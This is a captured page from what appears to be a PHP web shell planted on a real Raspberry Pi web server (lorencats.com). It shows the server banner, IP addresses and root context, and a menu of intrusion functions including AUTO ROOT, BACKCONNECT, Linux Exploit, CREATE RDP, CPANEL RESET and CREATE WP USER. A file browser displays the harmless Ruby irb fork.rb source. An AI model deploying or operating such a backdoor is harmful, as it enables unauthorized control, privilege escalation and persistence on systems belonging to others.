Linux lorencats.com 5.10.103-v7l+ #1529 SMP Tue Mar 8 12:24:00 GMT 2022 armv7l
Apache/2.4.59 (Raspbian)
: 10.0.0.29 | : 216.73.216.10
Cant Read [ /etc/named.conf ]
7.3.31-1~deb10u7
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
lib /
ruby /
2.5.0 /
irb /
cmd /
[ HOME SHELL ]
Name
Size
Permission
Action
chws.rb
542
B
-rw-r--r--
fork.rb
645
B
-rw-r--r--
help.rb
697
B
-rw-r--r--
load.rb
1.2
KB
-rw-r--r--
nop.rb
553
B
-rw-r--r--
pushws.rb
683
B
-rw-r--r--
subirb.rb
663
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : fork.rb
# frozen_string_literal: false # # fork.rb - # $Release Version: 0.9.6 $ # $Revision: 56371 $ # by Keiju ISHITSUKA(keiju@ruby-lang.org) # # -- # # # # :stopdoc: module IRB module ExtendCommand class Fork < Nop def execute pid = send ExtendCommand.irb_original_method_name("fork") unless pid class << self alias_method :exit, ExtendCommand.irb_original_method_name('exit') end if iterator? begin yield ensure exit end end end pid end end end end # :startdoc:
Close